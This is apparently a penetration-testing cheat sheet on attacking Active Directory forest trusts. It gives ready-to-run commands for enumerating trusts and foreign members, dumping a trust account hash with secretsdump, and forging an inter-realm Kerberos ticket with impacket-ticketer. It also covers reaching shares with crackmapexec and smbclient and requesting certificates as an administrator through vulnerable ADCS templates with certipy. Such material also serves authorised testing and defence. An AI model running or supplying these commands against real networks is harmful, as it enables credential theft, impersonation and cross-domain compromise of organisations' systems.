Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Enumerate Forest Trusts

Get-ADTrust -Filter * | ? {$_.ForestTransitive -eq $true}
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
Get-DomainTrust -Domain target-forest.local

Cross-Forest Enumeration

Users in Foreign Domain

Get-DomainUser -Domain target-forest.local

Foreign Group Membership

Get-DomainForeignGroupMember -Domain target-forest.local
Get-DomainForeignUser -Domain target-forest.local

BloodHound

Collect data from both forests. Analyze cross-forest edges. 
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
bloodhound-python -u user -p pass -d target-forest.local -ns TARGET_DC_IP -c all

SID Filtering Bypass (Limited)

SID filtering blocks high-privilege SIDs (S-1-5-21-*-500, -512, -519, etc.) across forest trusts.

What Still Works

SIDs not filtered across forests:
  • Domain Users (S-1-5-21-*-513)
  • Custom group SIDs (if explicitly permitted)

Check Filtering Status

nltest /sc_query:target-forest.local
netdom trust target-forest.local /domain:domain.local /quarantine

Trust Account Attack

Get Foreign Trust Account

impacket-secretsdump DOMAIN/admin:pass@DC_IP -just-dc-user 'TARGET-FOREST$'

Forge Trust Ticket

impacket-ticketer -nthash TRUST_HASH -domain-sid MY_SID -domain domain.local -spn krbtgt/TARGET-FOREST.LOCAL -extra-sid S-1-5-21-TARGET-513 administrator
Limited to non-filtered SIDs.

Shared Resources Abuse

If foreign forest resources are accessible: 
# Enumerate accessible shares
crackmapexec smb TARGET_FOREST_HOSTS -u 'DOMAIN\user' -p password --shares

# Access
smbclient //TARGET/share -U 'DOMAIN\user%password'

ADCS Cross-Forest

If ADCS in target forest trusts your domain: 
certipy find -u [email protected] -p pass -dc-ip TARGET_DC -vulnerable
certipy req -u [email protected] -p pass -ca TARGET_CA -template VulnTemplate -upn [email protected]

PAM Trust (Bastion Forest)

Privileged Access Management trust allows shadow principals in bastion forest to map to principals in production forest. 
# Check for PAM trust
Get-ADTrust -Filter {SIDFilteringForestAware -eq $true}

Quick Reference

TaskCommand
Enum trustsGet-ADTrust -Filter *
Foreign membersGet-DomainForeignGroupMember
Trust accountsecretsdump -just-dc-user 'FOREST$'
SID filteringBlocks privileged SIDs across forests
Shared resourcescrackmapexec smb HOSTS -u user -p pass --shares